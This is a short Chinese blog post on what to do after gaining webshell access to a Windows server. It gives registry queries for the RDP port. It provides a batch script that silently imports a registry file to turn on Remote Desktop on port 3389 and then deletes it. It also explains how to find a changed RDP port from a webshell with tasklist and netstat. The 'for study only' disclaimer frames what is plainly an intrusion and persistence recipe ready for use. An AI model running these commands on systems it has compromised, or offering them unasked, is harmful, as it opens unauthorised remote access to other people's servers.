WebShell -- 开启3389服务 - Kirin博客

WebShell -- 开启3389服务

作者: Bee

全网最全的网络资源分享网站

标签:

shellwebshellweb

特别声明:部分文章为网络转载,资源使用一般不提供任何帮助,特殊资源除外,如有侵权请联系站长!请勿违法!本站文章仅供学习了解!技术无罪!

kirin博客

一、查询远程连接的端口

1、命令查询,win7/win10/win2003都可以使用

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

0xd3d转换十进制是3389

2、注册表查询

二、开启3389端口的方法

1、工具开启

2、批处理开启,将下面代码复制到bat文件,双击自行开启远程连接

echo Windows Registry Editor Version 5.00>>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.regecho "fDenyTSConnections"=dword:00000000>>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.regecho "PortNumber"=dword:00000d3d>>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.regecho "PortNumber"=dword:00000d3d>>3389.regregedit /s 3389.regdel 3389.reg

三、当3389端口被修改后,如何查找

1、通过大马的读注册表、找到3389端口,然后读取

2、通过大马的cmd命令

tasklist /svc,获取termservice的pid号

再执行netstat -ano查找2684对应的的端口就是远程连接端口

3、通过工具扫描



工具下载方式:加入交流群

注意:软件均来自网络,不能保证安全性

分享到:
加入交流群
未经允许不得转载:

作者: Bee, 转载或复制请以 超链接形式 并注明出处 Kirin博客
原文地址: 《WebShell -- 开启3389服务》 发布于2021-3-14

切换注册

登录

您也可以使用第三方帐号快捷登录

切换登录

注册

觉得文章有用就加入交流群吧

QQ扫一扫